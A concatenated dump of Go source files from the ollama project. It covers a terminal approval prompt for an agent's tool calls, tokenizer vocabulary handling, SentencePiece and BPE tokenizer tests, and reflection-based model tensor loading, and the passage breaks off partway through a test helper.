			if availableWidth < 5 {
				availableWidth = 5
			}
			inputDisplay := state.denyReason
			if len(inputDisplay) > availableWidth {
				inputDisplay = inputDisplay[len(inputDisplay)-availableWidth:]
			}
			if i == state.selected {
				fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
			} else {
				fmt.Fprintf(os.Stderr, "%s│\033[0m \033[90m%s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
			}
		} else {
			displayLabel := label
			if len(displayLabel) > state.innerWidth-2 {
				displayLabel = displayLabel[:state.innerWidth-5] + "..."
			}
			if i == state.selected {
				fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %-*s\033[0m %s│\033[0m\033[K\r\n", boxColor, state.innerWidth-2, displayLabel, boxColor)
			} else {
				fmt.Fprintf(os.Stderr, "%s│\033[0m %-*s %s│\033[0m\033[K\r\n", boxColor, state.innerWidth-2, displayLabel, boxColor)
			}
		}
	}
	// Redraw bottom and hint
	fmt.Fprintf(os.Stderr, "%s└%s┘\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2))
	for i, line := range hintLines {
		if i == len(hintLines)-1 {
			fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K", line)
		} else {
			fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K\r\n", line)
		}
	}
}

// updateReasonInput updates just the Deny option line (which contains the reason input)
func updateReasonInput(state *selectorState) {
	hintLines := getHintLines(state)
	// Use red for warning (outside cwd), cyan for normal
	boxColor := "\033[36m" // cyan
	if state.isWarning {
		boxColor = "\033[91m" // bright red
	}
	// Move up to the Deny line (3rd option, index 2)
	// Cursor is at end of last hint line, need to go up:
	// (hint lines - 1) + 1 (bottom border) + 1 (Deny is last option)
	linesToMove := len(hintLines) - 1 + 1 + 1
	fmt.Fprintf(os.Stderr, "\033[%dA\r", linesToMove)
	// Redraw Deny line with reason
	denyLabel := "3. Deny: "
	availableWidth := state.innerWidth - 2 - len(denyLabel)
	if availableWidth < 5 {
		availableWidth = 5
	}
	inputDisplay := state.denyReason
	if len(inputDisplay) > availableWidth {
		inputDisplay = inputDisplay[len(inputDisplay)-availableWidth:]
	}
	if state.selected == 2 {
		fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
	} else {
		fmt.Fprintf(os.Stderr, "%s│\033[0m \033[90m%s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
	}
	// Redraw bottom and hint
	fmt.Fprintf(os.Stderr, "%s└%s┘\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2))
	for i, line := range hintLines {
		if i == len(hintLines)-1 {
			fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K", line)
		} else {
			fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K\r\n", line)
		}
	}
}

// clearSelectorBox clears the selector from screen
func clearSelectorBox(state *selectorState) {
	// Clear the current line (hint line) first
	fmt.Fprint(os.Stderr, "\r\033[K")
	// Move up and clear each remaining line
	for range state.totalLines - 1 {
		fmt.Fprint(os.Stderr, "\033[A\033[K")
	}
	fmt.Fprint(os.Stderr, "\r")
}

// fallbackApproval handles approval when terminal control isn't available.
// It uses plain line-oriented prompts on stderr/stdin instead of raw mode.
func (a *ApprovalManager) fallbackApproval(toolDisplay string) (ApprovalResult, error) {
	fmt.Fprintln(os.Stderr)
	fmt.Fprintln(os.Stderr, "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
	fmt.Fprintln(os.Stderr, toolDisplay)
	fmt.Fprintln(os.Stderr, "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
	fmt.Fprintln(os.Stderr, "[1] Execute once [2] Always allow [3] Deny")
	fmt.Fprint(os.Stderr, "Choice: ")
	var input string
	fmt.Scanln(&input)
	switch input {
	case "1":
		return ApprovalResult{Decision: ApprovalOnce}, nil
	case "2":
		return ApprovalResult{Decision: ApprovalAlways}, nil
	default:
		fmt.Fprint(os.Stderr, "Reason (optional): ")
		var reason string
		fmt.Scanln(&reason)
		return ApprovalResult{Decision: ApprovalDeny, DenyReason: reason}, nil
	}
}

// Reset clears the session allowlist.
func (a *ApprovalManager) Reset() {
	a.mu.Lock()
	defer a.mu.Unlock()
	a.allowlist = make(map[string]bool)
	a.prefixes = make(map[string]bool)
}

// AllowedTools returns a list of tools and prefixes in the allowlist.
// Prefix entries are suffixed with "*" to distinguish them from exact keys.
func (a *ApprovalManager) AllowedTools() []string {
	a.mu.RLock()
	defer a.mu.RUnlock()
	tools := make([]string, 0, len(a.allowlist)+len(a.prefixes))
	for tool := range a.allowlist {
		tools = append(tools, tool)
	}
	for prefix := range a.prefixes {
		tools = append(tools, prefix+"*")
	}
	return tools
}

// FormatApprovalResult returns a formatted string showing the approval result.
// Output includes ANSI color codes for the status icon.
func FormatApprovalResult(toolName string, args map[string]any, result ApprovalResult) string {
	var status string
	var icon string
	switch result.Decision {
	case ApprovalOnce:
		status = "Approved"
		icon = "\033[32m✓\033[0m"
	case ApprovalAlways:
		status = "Always allowed"
		icon = "\033[32m✓\033[0m"
	case ApprovalDeny:
		status = "Denied"
		icon = "\033[31m✗\033[0m"
	}
	// Format based on tool type
	if toolName == "bash" {
		if cmd, ok := args["command"].(string); ok {
			// Truncate long commands
			if len(cmd) > 40 {
				cmd = cmd[:37] + "..."
			}
			return fmt.Sprintf("▶ bash: %s [%s] %s", cmd, status, icon)
		}
	}
	if toolName == "web_search" {
		if query, ok := args["query"].(string); ok {
			// Truncate long queries
			if len(query) > 40 {
				query = query[:37] + "..."
			}
			return fmt.Sprintf("▶ web_search: %s [%s] %s", query, status, icon)
		}
	}
	return fmt.Sprintf("▶ %s [%s] %s", toolName, status, icon)
}

// FormatDenyResult returns the tool result message when a tool is denied.
func FormatDenyResult(toolName string, reason string) string {
	if reason != "" {
		return fmt.Sprintf("User denied execution of %s. Reason: %s", toolName, reason)
	}
	return fmt.Sprintf("User denied execution of %s.", toolName)
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/x/agent/approval_windows.go
x/agent/approval_windows.go
//go:build windows

package agent

import (
	"os"

	"golang.org/x/sys/windows"
)

// flushStdin clears any buffered console input on Windows, so keystrokes
// typed while a long operation was running are not replayed into the next
// interactive prompt.
//
// The int parameter is ignored here; presumably it carries the file
// descriptor used by the non-Windows implementation of the same function —
// confirm against the unix variant. On Windows the console handle is taken
// directly from os.Stdin instead.
//
// The error from FlushConsoleInputBuffer is deliberately discarded: this is
// best-effort cleanup and there is no useful recovery.
func flushStdin(_ int) {
	handle := windows.Handle(os.Stdin.Fd())
	_ = windows.FlushConsoleInputBuffer(handle)
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/vocabulary.go
model/vocabulary.go
package model

import (
	"log/slog"
	"slices"
	"sync"
)

// Special identifies a class of special token.
type Special int32

const (
	SpecialBOS Special = iota
	SpecialEOS
)

// Vocabulary holds a tokenizer's token tables: token strings, their types and
// scores, BPE merge rules, and the BOS/EOS token ids together with whether
// they should be added to prompts automatically.
//
// The reverse lookup maps (token string -> id, merge pair -> rank) and the
// special-token list are built lazily, exactly once, via sync.Once, so a
// Vocabulary is safe for concurrent readers after construction.
type Vocabulary struct {
	Values []string  // token id -> token string
	Types  []int32   // token id -> token type (TOKEN_TYPE_* constants)
	Scores []float32 // token id -> score
	Merges []string  // BPE merges, one "left right" pair per entry; index is rank

	BOS, EOS       []int32 // candidate beginning/end-of-sequence token ids
	AddBOS, AddEOS bool    // whether addSpecials should prepend/append them

	specialOnce sync.Once
	special     []string // lazily built list of special token strings

	valuesOnce sync.Once
	values     map[string]int32 // lazily built token string -> id

	mergeOnce sync.Once
	merge     map[string]int32 // lazily built "left right" -> merge rank
}

// Is reports whether id belongs to the given special-token class.
func (v *Vocabulary) Is(id int32, special Special) bool {
	switch special {
	case SpecialBOS:
		return slices.Contains(v.BOS, id)
	case SpecialEOS:
		return slices.Contains(v.EOS, id)
	default:
		return false
	}
}

// addSpecials prepends the primary BOS token and/or appends the primary EOS
// token according to AddBOS/AddEOS. Tokens are added even when already
// present (this intentionally matches previous behaviour); a warning is
// logged in that case.
func (v *Vocabulary) addSpecials(ids []int32) []int32 {
	if v.AddBOS && len(v.BOS) > 0 {
		if len(ids) > 0 && slices.Contains(v.BOS, ids[0]) {
			slog.Warn("adding bos token to prompt which already has it", "id", v.BOS)
		}

		slog.Debug("adding bos token to prompt", "id", v.BOS[0])
		ids = append([]int32{v.BOS[0]}, ids...)
	}

	if v.AddEOS && len(v.EOS) > 0 {
		// BUGFIX: this previously tested membership against v.BOS, so the
		// "already has eos" warning could never fire; duplicate detection
		// for the trailing token must look at the EOS set. The returned ids
		// are unchanged either way — only the warning is affected.
		if len(ids) > 0 && slices.Contains(v.EOS, ids[len(ids)-1]) {
			slog.Warn("adding eos token to prompt which already has it", "id", v.EOS)
		}

		slog.Debug("adding eos token to prompt", "id", v.EOS[0])
		ids = append(ids, v.EOS[0])
	}

	return ids
}

// Encode returns the id of the exact token string s, or -1 when s is not in
// the vocabulary. The lookup map is built on first use.
func (v *Vocabulary) Encode(s string) int32 {
	v.valuesOnce.Do(func() {
		v.values = make(map[string]int32, len(v.Values))
		for i, value := range v.Values {
			v.values[value] = int32(i)
		}
	})

	if id, ok := v.values[s]; ok {
		return id
	}

	return -1
}

// Decode returns the token string for id. It panics if id is out of range
// for Values; callers are expected to pass ids produced by this vocabulary.
func (v *Vocabulary) Decode(id int32) string {
	return v.Values[id]
}

// SpecialVocabulary returns the strings of all control and user-defined
// tokens. The list is computed once and cached.
func (v *Vocabulary) SpecialVocabulary() []string {
	v.specialOnce.Do(func() {
		for i := range v.Values {
			if v.Types[i] == TOKEN_TYPE_CONTROL || v.Types[i] == TOKEN_TYPE_USER_DEFINED {
				v.special = append(v.special, v.Values[i])
			}
		}
	})

	return v.special
}

// Merge returns the rank of the merge joining left and right, or -1 when the
// pair is not mergeable. The rank map is built on first use.
func (v *Vocabulary) Merge(left, right string) int {
	v.mergeOnce.Do(func() {
		v.merge = make(map[string]int32, len(v.Merges))
		for i, merge := range v.Merges {
			v.merge[merge] = int32(i)
		}
	})

	if id, ok := v.merge[left+" "+right]; ok {
		return int(id)
	}

	return -1
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/sentencepiece_test.go
model/sentencepiece_test.go
package model

import (
	"log/slog"
	"os"
	"path/filepath"
	"slices"
	"testing"

	"google.golang.org/protobuf/proto"

	"github.com/ollama/ollama/convert/sentencepiece"
)

// loadSentencePieceVocab builds a SentencePiece tokenizer from the gemma2
// tokenizer.model protobuf fixture in testdata.
func loadSentencePieceVocab(t *testing.T) SentencePiece {
	t.Helper()

	bts, err := os.ReadFile(filepath.Join("testdata", "gemma2", "tokenizer.model"))
	if err != nil {
		t.Fatal(err)
	}

	var spm sentencepiece.ModelProto
	if err := proto.Unmarshal(bts, &spm); err != nil {
		t.Fatal(err)
	}

	var v Vocabulary

	for _, piece := range spm.GetPieces() {
		v.Values = append(v.Values, piece.GetPiece())
		v.Scores = append(v.Scores, piece.GetScore())
		// Pieces with a recognized special type keep that type; everything
		// else is treated as a NORMAL token.
		switch t := piece.GetType(); t {
		case sentencepiece.ModelProto_SentencePiece_UNKNOWN,
			sentencepiece.ModelProto_SentencePiece_CONTROL,
			sentencepiece.ModelProto_SentencePiece_UNUSED,
			sentencepiece.ModelProto_SentencePiece_BYTE:
			v.Types = append(v.Types, int32(t))
		default:
			tt := int32(sentencepiece.ModelProto_SentencePiece_NORMAL)
			// todo parse the special tokens file
			// - this will roundtrip correctly but the <start_of_turn> and
			// <end_of_turn> tokens aren't processed
			v.Types = append(v.Types, tt)
		}
	}

	return NewSentencePiece(&v)
}

// TestSentencePieceEncode checks Encode/Decode roundtrips over a mix of
// whitespace, multilingual, and symbol-heavy inputs, plus exact ids for the
// <bos>/<eos> special tokens.
func TestSentencePieceEncode(t *testing.T) {
	logger := slog.New(slog.NewTextHandler(os.Stdout, &slog.HandlerOptions{Level: slog.LevelDebug}))
	slog.SetDefault(logger)

	tokenizer := loadSentencePieceVocab(t)

	t.Run("basic roundtrip", func(t *testing.T) {
		t.Parallel()

		cases := []string{
			"hello",
			"hello ",
			"hello  ",
			" hello",
			" hello ",
			" hello  ",
			"hello world",
			"请考试我的软件!12345",
			"你好",
			"Hello 你好 world!",
			"Special characters: !@#$%^&*()_+-=[]{}|;':\",./<>?",
			"Multilingual: 你好 こんにちは Привет Hola مرحبا",
			"Numbers and symbols: 123456789 +- */",
			"Special tokens: <bos> text <eos>",
			"Code snippets: func main() { fmt.Println(\"Hello World\") }",
			"Long text: " + "Lorem ipsum dolor sit amet, consectetur adipiscing elit. " +
				"Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. " +
				"Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris.",
		}

		for _, want := range cases {
			ids, err := tokenizer.Encode(want, true)
			if err != nil {
				t.Fatal(err)
			}

			if got, err := tokenizer.Decode(ids); err != nil {
				t.Fatal(err)
			} else if got != want {
				t.Errorf("got %q, want %q [%#v]", got, want, ids)
			}
		}
	})

	t.Run("special tokens", func(t *testing.T) {
		type candidate struct {
			token string
			ids   []int32
		}

		cases := []candidate{
			{"<bos>", []int32{2}},
			{"<eos>", []int32{1}},
		}

		for _, want := range cases {
			ids, err := tokenizer.Encode(want.token, true)
			if err != nil {
				t.Fatal(err)
			}
			if !slices.Equal(ids, want.ids) {
				t.Errorf("got %#v, want %#v", ids, want.ids)
			}
		}
	})
}

// TestSentencePieceDecodeByteTokens verifies that <0xNN> byte tokens decode
// to raw bytes, and that consecutive byte tokens reassemble into a single
// multi-byte UTF-8 character.
func TestSentencePieceDecodeByteTokens(t *testing.T) {
	vocab := &Vocabulary{
		Values: []string{
			"normal",
			"<0xEA>",
			"<0x41>",
			"<0xC3>",
			"<0xA3>",
		},
		Types: []int32{
			TOKEN_TYPE_NORMAL,
			TOKEN_TYPE_BYTE,
			TOKEN_TYPE_BYTE,
			TOKEN_TYPE_BYTE,
			TOKEN_TYPE_BYTE,
		},
		Scores: []float32{0, 0, 0, 0, 0},
	}

	spm := NewSentencePiece(vocab)

	tests := []struct {
		name     string
		ids      []int32
		expected string
	}{
		{
			name:     "single byte token",
			ids:      []int32{1},
			expected: "\xea",
		},
		{
			name:     "ASCII byte token",
			ids:      []int32{2},
			expected: "A",
		},
		{
			// 0xC3 0xA3 is the UTF-8 encoding of 'ã'.
			name:     "multiple byte tokens forming UTF-8 character",
			ids:      []int32{3, 4},
			expected: "ã",
		},
	}

	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			result, err := spm.Decode(tt.ids)
			if err != nil {
				t.Errorf("failed to decode token IDs %v: %v", tt.ids, err)
			}
			if result != tt.expected {
				t.Errorf("got %q, want %q", result, tt.expected)
			}
		})
	}
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/model.go
model/model.go
package model

import (
	"errors"
	"fmt"
	_ "image/jpeg"
	_ "image/png"
	"log/slog"
	"os"
	"reflect"
	"strconv"
	"strings"

	_ "golang.org/x/image/bmp"
	_ "golang.org/x/image/tiff"
	_ "golang.org/x/image/webp"

	"github.com/ollama/ollama/fs"
	fsggml "github.com/ollama/ollama/fs/ggml"
	"github.com/ollama/ollama/kvcache"
	"github.com/ollama/ollama/logutil"
	"github.com/ollama/ollama/ml"
	_ "github.com/ollama/ollama/ml/backend"
	"github.com/ollama/ollama/ml/nn/pooling"
	"github.com/ollama/ollama/model/input"
)

var (
	ErrNoVisionModel        = errors.New("this model is missing data required for image input")
	ErrUnsupportedModel     = errors.New("model not supported")
	ErrUnsupportedTokenizer = errors.New("tokenizer not supported")
)

// Model implements a specific model architecture, defining the forward pass and any model-specific configuration
type Model interface {
	Forward(ml.Context, input.Batch) (ml.Tensor, error)

	Backend() ml.Backend
	Config() config
}

// MultimodalProcessor must be implemented by multimodal models.
type MultimodalProcessor interface {
	// EncodeMultimodal processes a single input (such as an image) and
	// generates an output (typically an embedding) that can be used by the model.
	//
	// The return value is one or more tensors, each with optional model-specific
	// opaque metadata. Typically, the tensors might be views into an embedding
	// with each view representing a chunk of data that can be processed independently
	// in different batches.
	//
	// The result may be cached by the runner.
	EncodeMultimodal(ml.Context, []byte) ([]input.Multimodal, error)

	// PostTokenize is called after tokenization to allow the model to edit the
	// input stream to correctly arrange multimodal elements.
	//
	// The input is a slice of tokens with the results of EncodeMultimodal interleaved
	// in the order that the user provided them. Each element of the slice will be
	// either a single token or single multimodal object.
	//
	// The model must ensure that inputs are stored according to how they will be
	// processed and stored in the cache. For example, Llava-style models should insert
	// placeholder tokens equal to the feature size of the corresponding image with
	// the image itself attached to and split across these tokens. When Forward is called
	// a partial subset of these tokens may be submitted according to the batch size.
	//
	// This function is also responsible for updating MultimodalHash for any Multimodal
	// that is modified to ensure that there is a unique hash value that accurately
	// represents the contents.
	PostTokenize([]*input.Input) ([]*input.Input, error)
}

// Base implements the common fields and methods for all models
type Base struct {
	b ml.Backend
	config
}

// config carries model-wide configuration shared through Base embedding.
type config struct {
	Cache kvcache.Cache
}

// Backend returns the underlying backend that will run the model
func (m *Base) Backend() ml.Backend {
	return m.b
}

// Config returns the model-wide configuration (currently the KV cache).
func (m *Base) Config() config {
	return m.config
}

// models maps an architecture name to its registered constructor.
var models = make(map[string]func(fs.Config) (Model, error))

// Register registers a model constructor for the given architecture
func Register(name string, f func(fs.Config) (Model, error)) {
	if _, ok := models[name]; ok {
		panic("model: model already registered")
	}

	models[name] = f
}

// New initializes a new model instance with the provided configuration based on the metadata in the model file
func New(modelPath string, params ml.BackendParams) (Model, error) {
	b, err := ml.NewBackend(modelPath, params)
	if err != nil {
		return nil, err
	}

	m, err := modelForArch(b.Config())
	if err != nil {
		return nil, err
	}

	base := Base{b: b, config: m.Config()}

	// Walk the model struct via reflection, wiring in the Base and binding
	// gguf-tagged tensor fields to tensors loaded by the backend.
	v := reflect.ValueOf(m)
	v.Elem().Set(populateFields(base, v.Elem()))

	return m, nil
}

// NewTextProcessor constructs only the text processor (tokenizer) for the
// GGUF file at path s, returning ErrUnsupportedTokenizer if the resolved
// model does not implement TextProcessor.
func NewTextProcessor(s string) (TextProcessor, error) {
	r, err := os.Open(s)
	if err != nil {
		return nil, err
	}
	defer r.Close()

	meta, err := fsggml.Decode(r, -1)
	if err != nil {
		return nil, err
	}

	m, err := modelForArch(meta.KV())
	if err != nil {
		return nil, err
	}

	tp, ok := m.(TextProcessor)
	if !ok {
		return nil, ErrUnsupportedTokenizer
	}

	return tp, nil
}

// modelForArch resolves the registered constructor for the file's
// architecture. A non-none pooling_type selects the "_embed" variant.
func modelForArch(c fs.Config) (Model, error) {
	arch := c.Architecture()
	if pooling.Type(c.Uint("pooling_type")) != pooling.TypeNone {
		arch = arch + "_embed"
	}

	f, ok := models[arch]
	if !ok {
		return nil, ErrUnsupportedModel
	}

	return f(c)
}

// populateFields recursively fills a model struct: Base fields receive base,
// ml.Tensor fields are looked up in the backend by joining the accumulated
// gguf tag path with ".", and pointer/interface/slice/array fields recurse.
// If every nillable field of a struct ends up nil, the zero value is returned
// so the caller can leave the whole sub-struct unset.
func populateFields(base Base, v reflect.Value, tags ...Tag) reflect.Value {
	t := v.Type()

	if t.Kind() == reflect.Struct {
		allNil := true
		for i := range t.NumField() {
			tt := t.Field(i).Type
			vv := v.Field(i)
			if !vv.CanSet() {
				// unexported field; skip
				continue
			}

			// make a copy
			tagsCopy := tags
			if tag := t.Field(i).Tag.Get("gguf"); tag != "" {
				tagsCopy = append(tagsCopy, parseTag(tag))
			}

			if tt == reflect.TypeOf((*Base)(nil)).Elem() {
				vv.Set(reflect.ValueOf(base))
			} else if tt == reflect.TypeOf((*ml.Tensor)(nil)).Elem() {
				// Expand the tag chain into every candidate tensor name:
				// each tag contributes its name plus alternatives, and its
				// pre:/suf: decorate the names produced by child tags.
				var fn func([]Tag, string, string) [][]string
				fn = func(tags []Tag, prefix, suffix string) (fullNames [][]string) {
					if len(tags) > 0 {
						var names []string
						if tags[0].name != "" {
							for _, n := range append([]string{tags[0].name}, tags[0].alternatives...) {
								names = append(names, prefix+n+suffix)
							}
						}

						childNames := fn(tags[1:], tags[0].prefix, tags[0].suffix)
						if len(names) == 0 {
							// current tag has no name, use child names only
							fullNames = append(fullNames, childNames...)
						} else if len(childNames) == 0 {
							// current tag has names but no children, create branches for each name
							for _, name := range names {
								fullNames = append(fullNames, []string{name})
							}
						} else {
							// merge each name with each child
							for _, name := range names {
								for _, childName := range childNames {
									fullNames = append(fullNames, append([]string{name}, childName...))
								}
							}
						}
					}

					return fullNames
				}

				// First candidate found in the backend wins.
				names := fn(tagsCopy, "", "")
				for _, name := range names {
					if tensor := base.Backend().Get(strings.Join(name, ".")); tensor != nil {
						logutil.Trace("found tensor", "", tensor)
						vv.Set(reflect.ValueOf(tensor))
						break
					}
				}
			} else if tt.Kind() == reflect.Pointer || tt.Kind() == reflect.Interface {
				setPointer(base, vv, tagsCopy)
			} else if tt.Kind() == reflect.Slice || tt.Kind() == reflect.Array {
				// Each element gets its index appended as a tag component.
				for i := range vv.Len() {
					vvv := vv.Index(i)
					if vvv.Kind() == reflect.Pointer || vvv.Kind() == reflect.Interface {
						setPointer(base, vvv, append(tagsCopy, Tag{name: strconv.Itoa(i)}))
					} else {
						vvv.Set(populateFields(base, vvv, append(tagsCopy, Tag{name: strconv.Itoa(i)})...))
					}
				}
			}

			if !canNil(tt) || !vv.IsNil() {
				allNil = false
			}
		}

		if allNil {
			return reflect.Zero(t)
		}
	}

	return v
}

// setPointer populates the struct behind a pointer or interface field,
// allocating a new value for nil pointers, and assigns the populated
// address back only when populateFields produced a non-zero result.
func setPointer(base Base, v reflect.Value, tags []Tag) {
	vv := v
	if v.Kind() == reflect.Interface {
		if v.IsNil() {
			return
		}

		vv = vv.Elem()
	}

	vv = reflect.Indirect(vv)
	if v.IsNil() {
		vv = reflect.New(v.Type().Elem()).Elem()
	}

	if f := populateFields(base, vv, tags...); f.CanAddr() {
		v.Set(f.Addr())
	}
}

// Tag is one parsed component of a gguf struct tag.
type Tag struct {
	name,
	// prefix and suffix are applied to child tags
	prefix,
	suffix string
	alternatives []string
}

// parseTag parses a gguf struct tag of the form
// "name,alt:other,pre:prefix,suf:suffix" into a Tag.
func parseTag(s string) (tag Tag) {
	parts := strings.Split(s, ",")
	if len(parts) > 0 {
		tag.name = parts[0]

		for _, part := range parts[1:] {
			if value, ok := strings.CutPrefix(part, "alt:"); ok && tag.name == "" {
				// elevate alternative to primary if no primary given
				tag.name = value
				slog.Warn("gguf tag has alt: but no primary name", "tag", s)
			} else if ok {
				tag.alternatives = append(tag.alternatives, value)
			}

			if value, ok := strings.CutPrefix(part, "pre:"); ok {
				tag.prefix = value
			}

			if value, ok := strings.CutPrefix(part, "suf:"); ok {
				tag.suffix = value
			}
		}
	}

	return
}

// canNil reports whether the kind of t can hold nil (and so supports IsNil).
func canNil(t reflect.Type) bool {
	return t.Kind() == reflect.Chan ||
		t.Kind() == reflect.Func ||
		t.Kind() == reflect.Interface ||
		t.Kind() == reflect.Map ||
		t.Kind() == reflect.Pointer ||
		t.Kind() == reflect.Slice
}

// Forward validates the batch, primes the KV cache if configured, runs the
// model's forward pass, and schedules the resulting tensor for computation.
func Forward(ctx ml.Context, m Model, batch input.Batch) (ml.Tensor, error) {
	if len(batch.Positions) != len(batch.Sequences) {
		return nil, fmt.Errorf("length of positions (%v) must match length of seqs (%v)", len(batch.Positions), len(batch.Sequences))
	}

	if len(batch.Positions) < 1 {
		return nil, errors.New("batch size cannot be less than 1")
	}

	cache := m.Config().Cache
	if cache != nil {
		err := cache.StartForward(ctx, batch, false)
		if err != nil {
			return nil, err
		}
	}

	t, err := m.Forward(ctx, batch)
	if err != nil {
		return nil, err
	}

	ctx.Forward(t)

	return t, nil
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/vocabulary_test.go
model/vocabulary_test.go
package model

import (
	"testing"

	"github.com/google/go-cmp/cmp"
)

// TestSpecialVocabulary checks that only CONTROL and USER_DEFINED tokens are
// reported as special.
func TestSpecialVocabulary(t *testing.T) {
	vocab := &Vocabulary{
		Values: []string{"<|startoftext|>", "<|endoftext|>", "<|tool_call_start|>", "<|tool_call_end|>", "hi"},
		Types:  []int32{TOKEN_TYPE_CONTROL, TOKEN_TYPE_CONTROL, TOKEN_TYPE_USER_DEFINED, TOKEN_TYPE_USER_DEFINED, TOKEN_TYPE_NORMAL},
	}

	specialVocab := vocab.SpecialVocabulary()
	if len(specialVocab) != 4 {
		t.Errorf("expected 4 special tokens, got %d", len(specialVocab))
	}
}

// TestAddSpecialVocabulary pins addSpecials behaviour, including the two
// deliberate "duplicate anyway" cases kept for backwards compatibility.
func TestAddSpecialVocabulary(t *testing.T) {
	cases := []struct {
		name  string
		vocab *Vocabulary
		input []int32
		want  []int32
	}{
		{
			name: "add bos",
			vocab: &Vocabulary{
				BOS:    []int32{0},
				EOS:    []int32{1},
				AddBOS: true,
				AddEOS: false,
			},
			input: []int32{2, 3, 4},
			want:  []int32{0, 2, 3, 4},
		},
		{
			// TODO(mxyng): this is to match previous behaviour
			name: "add bos when already present",
			vocab: &Vocabulary{
				BOS:    []int32{0},
				EOS:    []int32{1},
				AddBOS: true,
				AddEOS: false,
			},
			input: []int32{0, 2, 3, 4},
			want:  []int32{0, 0, 2, 3, 4},
		},
		{
			name: "add eos",
			vocab: &Vocabulary{
				BOS:    []int32{0},
				EOS:    []int32{1},
				AddBOS: false,
				AddEOS: true,
			},
			input: []int32{2, 3, 4},
			want:  []int32{2, 3, 4, 1},
		},
		{
			// TODO(mxyng): this is to match previous behaviour
			name: "add eos when already present",
			vocab: &Vocabulary{
				BOS:    []int32{0},
				EOS:    []int32{1},
				AddBOS: false,
				AddEOS: true,
			},
			input: []int32{2, 3, 4, 1},
			want:  []int32{2, 3, 4, 1, 1},
		},
		{
			name: "add both",
			vocab: &Vocabulary{
				BOS:    []int32{0},
				EOS:    []int32{1},
				AddBOS: true,
				AddEOS: true,
			},
			input: []int32{2, 3, 4},
			want:  []int32{0, 2, 3, 4, 1},
		},
		{
			name: "add bos to empty inputs",
			vocab: &Vocabulary{
				BOS:    []int32{0},
				EOS:    []int32{1},
				AddBOS: true,
				AddEOS: false,
			},
			input: []int32{},
			want:  []int32{0},
		},
	}

	for _, tt := range cases {
		t.Run(tt.name, func(t *testing.T) {
			got := tt.vocab.addSpecials(tt.input)
			if diff := cmp.Diff(tt.want, got); diff != "" {
				t.Errorf("no match (-want +got):\n%s", diff)
			}
		})
	}
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/bytepairencoding_test.go
model/bytepairencoding_test.go
package model

import (
	"bufio"
	"encoding/json"
	"math"
	"os"
	"path/filepath"
	"slices"
	"strconv"
	"strings"
	"testing"

	"github.com/google/go-cmp/cmp"
)

// llama builds a BytePairEncoding tokenizer from the llama3.2 encoder.json
// and vocab.bpe fixtures, adding the begin/end-of-text special tokens when
// they are not already present in the encoder.
func llama(t testing.TB) BytePairEncoding {
	t.Helper()

	f, err := os.Open(filepath.Join("testdata", "llama3.2", "encoder.json"))
	if err != nil {
		t.Fatal(err)
	}
	defer f.Close()

	vocab := make(map[string]int32)
	if err := json.NewDecoder(f).Decode(&vocab); err != nil {
		t.Fatal(err)
	}

	types := make([]int32, len(vocab))
	tokens := make([]string, len(vocab))
	for token, id := range vocab {
		tokens[id] = token
		types[id] = 1
	}

	for _, token := range []string{"<|begin_of_text|>", "<|end_of_text|>"} {
		if _, ok := vocab[token]; !ok {
			tokens = append(tokens, token) //nolint:makezero
			types = append(types, 3)       //nolint:makezero
			vocab[token] = int32(len(vocab))
		}
	}

	f, err = os.Open(filepath.Join("testdata", "llama3.2", "vocab.bpe"))
	if err != nil {
		t.Fatal(err)
	}
	defer f.Close()

	merges := make([]string, 0, 50000)
	scanner := bufio.NewScanner(f)
	for scanner.Scan() {
		// "#"-prefixed lines are comments in the BPE merges file.
		if !strings.HasPrefix(scanner.Text(), "#") {
			merges = append(merges, scanner.Text())
		}
	}

	return NewBytePairEncoding(
		&Vocabulary{
			Values: tokens,
			Types:  types,
			Merges: merges,
		},
